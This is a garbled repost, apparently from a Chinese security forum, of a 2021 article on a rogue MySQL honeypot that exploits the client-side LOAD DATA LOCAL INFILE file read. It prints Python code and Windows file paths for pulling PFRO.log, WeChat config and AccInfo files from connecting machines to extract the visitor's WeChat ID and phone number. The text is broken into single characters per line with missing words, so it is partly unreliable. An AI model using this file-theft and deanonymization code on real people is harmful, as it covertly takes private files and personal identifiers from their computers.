论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
IOT
[22021] 2021-05-29_『红蓝对抗』利用蜜罐获取攻击者微信ID及手机号
文档创建者:
s7ckTeam
浏览次数:
6
最后更新:
2025-01-18
IOT
6 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2021-05-29_『红蓝对抗』利用蜜罐获取攻击者微信ID及手机号
『
红
蓝
对
抗
』
利
用
蜜
罐
获
取
攻
击
者
微
信
I
D
及
手
机
号
L
e
m
o
n
S
e
c
2
0
2
1
-
0
5
-
2
9
日
期
:
2
0
2
1
-
0
5
-
2
9
作
者
:
O
b
s
i
d
i
a
n
转
自
:
宸
极
实
验
室
介
绍
:
通
过
任
意
文
件
读
取
,
获
取
攻
击
者
的
微
信
以
及
绑
定
手
机
号
。
小
编
提
示
:
源
码
及
已
打
包
好
,
回
复
『
0
5
2
9
-
蜜
罐
』
获
取
源
码
。
0
x
0
0
前
言
之
前
在
打
的
时
候
,
多
次
遇
到
了
这
个
漏
洞
。
护
网
期
间
,
研
究
了
一
下
蜜
罐
的
骚
操
作
,
比
如
获
取
百
度
、
账
号
、
微
信
等
等
,
对
攻
击
者
进
行
攻
击
者
画
像
。
学
习
了
一
下
原
理
,
然
后
做
了
一
些
改
进
,
利
用
的
漏
洞
,
获
取
攻
击
者
手
机
号
。
本
系
统
代
码
非
完
全
原
创
,
部
分
代
码
参
照
。
关
于
任
意
文
件
读
取
漏
洞
,
网
上
很
多
大
佬
写
了
很
详
细
的
分
析
文
章
,
本
文
不
再
复
述
。
同
时
,
如
果
想
复
现
漏
洞
,
也
可
选
取
上
其
他
更
加
简
洁
的
单
文
件
M
y
S
Q
L
d
o
c
k
e
r
f
i
l
e
C
T
F
I
D
C
S
D
N
I
D
M
y
S
Q
L
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
q
i
g
p
i
g
/
M
y
s
q
l
H
o
n
e
y
p
o
t
M
y
S
Q
L
g
i
t
h
u
b
s
e
r
v
e
r
代
码
。
0
x
0
1
漏
洞
相
关
1
.
1
漏
洞
简
介
漏
洞
简
介
顾
名
思
义
,
就
是
虚
假
的
。
其
实
这
个
名
词
是
我
个
人
习
惯
的
称
呼
,
关
于
完
整
的
定
义
目
前
在
网
上
没
有
一
个
公
认
的
说
法
。
以
下
均
为
个
人
理
解
,
如
有
问
题
,
欢
迎
指
正
。
是
基
于
构
造
一
个
伪
装
的
服
务
器
,
通
过
命
令
或
诱
导
来
使
受
害
者
连
接
此
服
务
器
,
从
而
利
用
的
相
关
漏
洞
进
行
文
件
读
取
,
或
者
反
序
列
化
利
用
。
本
文
不
涉
及
反
序
列
化
的
利
用
,
可
以
简
单
理
解
为
一
个
蜜
罐
,
利
用
漏
洞
为
的
任
意
文
件
读
取
。
以
上
就
是
本
文
全
部
废
话
了
,
话
不
多
说
,
直
接
进
入
正
题
。
1
.
2
漏
洞
复
现
及
利
用
漏
洞
复
现
及
利
用
文
字
废
话
太
多
,
直
接
上
图
吧
。
F
a
k
e
M
y
S
Q
L
M
y
S
Q
L
F
a
k
e
M
y
S
Q
L
M
y
S
Q
L
M
y
S
Q
L
M
y
S
Q
L
L
O
A
D
D
A
T
A
L
O
C
A
L
I
N
F
I
L
E
如
图
所
示
当
我
在
服
务
器
上
运
行
代
码
,
并
设
置
我
想
要
读
取
的
文
件
,
即
可
进
入
监
听
模
式
。
当
攻
击
者
连
接
我
的
3
3
0
6
端
口
,
即
可
成
功
读
取
到
攻
击
者
电
脑
上
的
对
应
文
件
。
同
理
,
可
以
读
取
等
文
件
。
那
么
,
可
以
读
文
件
,
进
一
步
怎
样
拓
展
呢
?
根
据
大
佬
的
文
章
,
我
们
可
以
通
过
读
取
文
件
来
获
取
攻
击
者
的
用
户
名
,
根
据
用
户
名
读
取
相
应
文
件
夹
中
的
微
信
配
置
文
件
,
进
而
获
取
微
信
。
前
提
是
微
信
文
件
保
存
路
径
为
默
认
。
获
取
用
户
名
,
如
图
所
示
:
p
a
y
l
o
a
d
L
i
n
u
x
/
e
t
c
/
p
a
s
s
w
d
C
:
W
i
n
d
o
w
s
P
F
R
O
.
l
o
g
I
D
但
这
种
方
式
的
缺
点
是
,
只
能
单
文
件
读
取
,
每
次
需
要
重
新
设
置
文
件
名
,
不
能
实
现
循
环
读
取
。
于
是
,
根
据
中
的
部
分
代
码
,
进
行
进
一
步
的
完
善
和
修
改
,
就
有
了
下
面
的
内
容
:
0
x
0
2
工
具
相
关
2
.
1
代
码
相
关
代
码
相
关
开
门
见
山
,
本
系
统
代
码
乍
一
看
很
完
美
,
但
以
普
遍
理
性
而
论
,
仅
适
用
于
读
取
系
统
的
文
件
。
先
看
核
心
代
码
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
q
i
g
p
i
g
/
M
y
s
q
l
H
o
n
e
y
p
o
t
w
i
n
d
o
w
s
d
e
f
m
y
s
q
l
_
g
e
t
_
f
i
l
e
_
c
o
n
t
e
n
t
(
f
i
l
e
n
a
m
e
,
c
o
n
n
,
a
d
d
r
e
s
s
)
:
l
o
g
p
a
t
h
=
o
s
.
p
a
t
h
.
a
b
s
p
a
t
h
(
'
.
'
)
+
"
/
l
o
g
/
"
+
a
d
d
r
e
s
s
[
0
]
i
f
n
o
t
o
s
.
p
a
t
h
.
e
x
i
s
t
s
(
l
o
g
p
a
t
h
)
:
o
s
.
m
a
k
e
d
i
r
s
(
l
o
g
p
a
t
h
)
o
s
.
m
a
k
e
d
i
r
s
(
l
o
g
p
a
t
h
)
c
o
n
n
.
s
e
n
d
a
l
l
(
"
x
x
x
"
)
t
r
y
:
c
o
n
n
.
r
e
c
v
(
1
0
2
4
0
0
0
)
e
x
c
e
p
t
E
x
c
e
p
t
i
o
n
a
s
e
:
p
r
i
n
t
(
e
)
t
r
y
:
c
o
n
n
.
s
e
n
d
a
l
l
(
"
x
x
"
)
r
e
s
1
=
c
o
n
n
.
r
e
c
v
(
1
0
2
4
0
0
0
)
#
S
H
O
W
V
A
R
I
A
B
L
E
S
i
f
'
S
H
O
W
V
A
R
I
A
B
L
E
S
'
i
n
r
e
s
1
:
c
o
n
n
.
s
e
n
d
a
l
l
(
"
x
x
x
"
)
r
e
s
2
=
c
o
n
n
.
r
e
c
v
(
9
9
9
9
)
i
f
'
S
H
O
W
W
A
R
N
I
N
G
S
'
i
n
r
e
s
2
:
c
o
n
n
.
s
e
n
d
a
l
l
(
"
x
x
x
"
)
r
e
s
3
=
c
o
n
n
.
r
e
c
v
(
9
9
9
9
)
i
f
'
S
H
O
W
C
O
L
L
A
T
I
O
N
'
i
n
r
e
s
3
:
c
o
n
n
.
s
e
n
d
a
l
l
(
"
x
x
x
"
)
r
e
s
4
=
c
o
n
n
.
r
e
c
v
(
9
9
9
9
)
i
f
'
S
E
T
N
A
M
E
S
u
t
f
8
'
i
n
r
e
s
4
:
c
o
n
n
.
s
e
n
d
a
l
l
(
"
x
x
x
"
)
r
e
s
5
=
c
o
n
n
.
r
e
c
v
(
9
9
9
9
)
i
f
'
S
E
T
c
h
a
r
a
c
t
e
r
_
s
e
t
_
r
e
s
u
l
t
s
=
N
U
L
L
'
i
n
r
e
s
5
:
c
o
n
n
.
s
e
n
d
a
l
l
(
"
x
x
x
"
)
c
o
n
n
.
c
l
o
s
e
(
)
e
l
s
e
:
c
o
n
n
.
c
l
o
s
e
(
)
e
l
s
e
:
c
o
n
n
.
c
l
o
s
e
(
)
e
l
s
e
:
c
o
n
n
.
c
l
o
s
e
(
)
e
l
s
e
:
t
r
y
:
w
a
n
t
f
i
l
e
=
c
h
r
(
l
e
n
(
f
i
l
e
n
a
m
e
)
+
1
)
+
"
x
0
0
x
0
0
x
0
1
x
F
B
"
+
f
i
l
e
n
a
m
e
c
o
n
n
.
s
e
n
d
a
l
l
(
w
a
n
t
f
i
l
e
)
c
o
n
t
e
n
t
=
'
'
w
h
i
l
e
T
r
u
e
:
d
a
t
a
=
c
o
n
n
.
r
e
c
v
(
1
0
2
4
)
p
r
i
n
t
l
e
n
(
d
a
t
a
)
c
o
n
t
e
n
t
+
=
d
a
t
a
i
f
l
e
n
(
d
a
t
a
)
<
1
0
2
4
:
p
r
i
n
t
'
o
k
'
b
r
e
a
k
c
o
n
n
.
c
l
o
s
e
(
)
i
t
e
m
=
l
o
g
p
a
t
h
+
"
/
"
+
f
i
l
e
n
a
m
e
.
r
e
p
l
a
c
e
(
"
/
"
,
"
_
"
)
.
r
e
p
l
a
c
e
(
"
:
"
,
"
"
)
+
'
_
'
+
s
t
r
(
r
a
n
d
o
m
.
r
a
n
d
o
m
(
)
)
i
f
l
e
n
(
c
o
n
t
e
n
t
)
>
6
:
w
i
t
h
o
p
e
n
(
i
t
e
m
,
"
w
"
)
a
s
f
:
f
.
w
r
i
t
e
(
c
o
n
t
e
n
t
)
这
段
代
码
主
要
有
两
个
作
用
:
1
.
判
断
是
否
为
扫
描
器
或
者
密
码
爆
破
工
具
,
进
行
交
互
握
手
,
效
果
是
扫
描
器
直
接
爆
3
3
0
6
弱
口
令
。
2
.
如
果
是
直
接
连
接
,
去
读
取
设
定
好
的
文
件
,
并
写
入
本
地
保
存
。
P
S
:
为
了
防
止
读
取
文
件
内
容
不
完
整
,
加
入
了
循
环
。
f
.
w
r
i
t
e
(
c
o
n
t
e
n
t
)
f
.
c
l
o
s
e
(
)
r
e
t
u
r
n
(
T
r
u
e
,
c
o
n
t
e
n
t
)
e
l
s
e
:
r
e
t
u
r
n
(
F
a
l
s
e
,
c
o
n
t
e
n
t
)
e
x
c
e
p
t
E
x
c
e
p
t
i
o
n
a
s
e
:
p
r
i
n
t
(
e
)
e
x
c
e
p
t
E
x
c
e
p
t
i
o
n
a
s
e
:
p
r
i
n
t
(
e
)
w
h
i
l
e
w
h
i
l
e
T
r
u
e
:
c
o
n
n
,
a
d
d
r
e
s
s
=
s
v
.
a
c
c
e
p
t
(
)
f
i
r
s
t
_
t
i
m
e
=
d
a
t
e
t
i
m
e
.
d
a
t
e
t
i
m
e
.
n
o
w
(
)
.
s
t
r
f
t
i
m
e
(
"
%
Y
-
%
m
-
%
d
%
H
:
%
M
:
%
S
"
)
g
l
o
b
a
l
f
i
l
e
s
1
g
l
o
b
a
l
u
s
e
r
n
a
m
e
g
l
o
b
a
l
w
x
_
i
d
f
i
l
e
=
f
i
l
e
s
1
[
0
]
.
r
e
p
l
a
c
e
(
'
A
d
m
i
n
i
s
t
r
a
t
o
r
'
,
u
s
e
r
n
a
m
e
)
.
r
e
p
l
a
c
e
(
'
w
x
_
i
d
'
,
w
x
_
i
d
)
r
e
s
,
c
o
n
t
e
n
t
=
m
y
s
q
l
_
g
e
t
_
f
i
l
e
_
c
o
n
t
e
n
t
(
f
i
l
e
,
c
o
n
n
,
a
d
d
r
e
s
s
)
f
i
l
e
s
1
.
a
p
p
e
n
d
(
f
i
l
e
s
1
[
0
]
)
f
i
l
e
s
1
.
r
e
m
o
v
e
(
f
i
l
e
s
1
[
0
]
)
i
f
r
e
s
:
i
f
'
P
F
R
O
'
i
n
f
i
l
e
:
u
s
e
r
n
a
m
e
=
g
e
t
_
u
s
e
r
n
a
m
e
(
c
o
n
t
e
n
t
)
s
=
"
x
x
"
%
(
x
x
)
c
u
r
s
o
r
.
e
x
e
c
u
t
e
(
s
)
d
a
t
a
=
c
u
r
s
o
r
.
f
e
t
c
h
a
l
l
(
)
i
f
l
e
n
(
d
a
t
a
)
=
=
0
:
s
=
"
X
X
"
%
(
x
x
)
c
u
r
s
o
r
.
e
x
e
c
u
t
e
(
s
)
d
b
.
c
o
m
m
i
t
(
)
p
r
i
n
t
'
s
u
c
c
e
s
s
:
'
+
f
i
l
e
i
n
s
e
r
t
_
f
i
l
e
(
f
i
l
e
,
a
d
d
r
e
s
s
,
u
s
e
r
n
a
m
e
)
e
l
i
f
'
c
o
n
f
i
g
.
d
a
t
a
'
i
n
f
i
l
e
:
c
o
n
t
e
n
t
=
c
o
n
t
e
n
t
w
x
i
d
=
r
e
.
f
i
n
d
a
l
l
(
r
'
W
e
C
h
a
t
F
i
l
e
s
(
.
*
)
c
o
n
f
i
g
'
,
c
o
n
t
e
n
t
)
[
0
]
s
q
l
=
"
x
x
x
"
%
(
x
x
x
)
c
u
r
s
o
r
.
e
x
e
c
u
t
e
(
s
q
l
)
d
b
.
c
o
m
m
i
t
(
)
w
x
_
i
d
=
w
x
i
d
i
m
g
=
q
r
c
o
d
e
.
m
a
k
e
(
'
w
e
i
x
i
n
:
/
/
c
o
n
t
a
c
t
s
/
p
r
o
f
i
l
e
/
'
+
w
x
i
d
)
i
m
g
.
s
a
v
e
(
o
s
.
p
a
t
h
.
a
b
s
p
a
t
h
(
'
.
'
)
+
'
/
s
t
a
t
i
c
/
p
i
c
/
'
+
w
x
i
d
+
'
.
p
n
g
'
)
这
段
代
码
就
是
从
文
件
内
容
获
取
信
息
并
保
存
到
数
据
库
:
1
.
从
中
读
取
用
户
名
。
2
.
从
用
户
名
中
读
取
。
3
.
从
用
户
名
中
读
取
微
信
绑
定
的
手
机
号
。
根
据
可
生
成
微
信
二
维
码
,
可
添
加
好
友
,
根
据
实
际
测
试
,
就
算
关
掉
了
所
有
好
友
申
请
条
件
,
仍
可
通
过
此
二
维
码
发
起
好
友
申
请
。
剩
下
的
代
码
无
非
就
是
,
前
端
显
示
了
,
这
里
就
不
展
示
了
,
直
接
上
效
果
图
。
p
r
i
n
t
'
s
u
c
c
e
s
s
:
'
+
f
i
l
e
i
n
s
e
r
t
_
f
i
l
e
(
f
i
l
e
,
a
d
d
r
e
s
s
,
u
s
e
r
n
a
m
e
)
e
l
i
f
'
A
c
c
I
n
f
o
'
i
n
f
i
l
e
:
c
o
n
t
e
n
t
=
c
o
n
t
e
n
t
p
h
o
n
e
=
r
e
.
f
i
n
d
a
l
l
(
r
'
[
0
-
9
]
{
1
1
}
'
,
c
o
n
t
e
n
t
)
[
-
1
]
s
q
l
=
"
x
x
x
"
%
(
x
x
x
)
c
u
r
s
o
r
.
e
x
e
c
u
t
e
(
s
q
l
)
d
b
.
c
o
m
m
i
t
(
)
p
r
i
n
t
'
s
u
c
c
e
s
s
:
'
+
f
i
l
e
i
n
s
e
r
t
_
f
i
l
e
(
f
i
l
e
,
a
d
d
r
e
s
s
,
u
s
e
r
n
a
m
e
)
e
l
s
e
:
f
i
l
e
s
1
=
f
i
l
e
s
u
s
e
r
n
a
m
e
=
'
A
d
m
i
n
i
s
t
r
a
t
o
r
'
C
:
/
W
i
n
d
o
w
s
/
P
F
R
O
.
l
o
g
C
:
/
U
s
e
r
s
/
/
D
o
c
u
m
e
n
t
s
/
W
e
C
h
a
t
F
i
l
e
s
/
A
l
l
U
s
e
r
s
/
c
o
n
f
i
g
/
c
o
n
f
i
g
.
d
a
t
a
w
x
_
i
d
C
:
/
U
s
e
r
s
/
/
D
o
c
u
m
e
n
t
s
/
W
e
C
h
a
t
F
i
l
e
s
/
w
x
_
i
d
/
c
o
n
f
i
g
/
A
c
c
I
n
f
o
.
d
a
t
w
x
_
i
d
2
.
2
效
果
图
效
果
图
首
先
,
启
动
。
本
来
想
在
端
口
结
合
获
取
一
下
以
及
其
他
信
息
,
但
无
奈
公
开
的
接
口
都
失
效
了
,
端
口
只
能
作
为
一
个
诱
饵
了
,
下
一
步
会
研
究
一
些
如
何
获
取
百
度
等
论
坛
的
账
号
信
息
。
d
o
c
k
e
r
8
0
j
s
o
n
p
百
度
i
d
8
0
访
问
端
口
。
登
录
后
:
5
0
0
0
具
体
效
果
:
目
前
实
现
了
获
取
微
信
和
手
机
号
,
对
于
溯
源
来
说
,
已
经
足
够
用
了
。
2
.
3
吐
槽
相
关
吐
槽
相
关
前
前
后
后
,
修
修
改
改
,
花
了
差
不
多
五
天
时
间
才
完
全
搞
定
,
但
还
是
存
在
,
请
多
担
待
。
本
来
想
增
加
文
件
的
读
取
,
但
时
间
和
精
力
有
限
,
只
能
后
续
补
上
。
根
据
大
佬
的
思
路
,
本
来
想
解
决
同
一
b
u
g
l
i
n
u
x
q
i
g
p
i
g
I
P
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页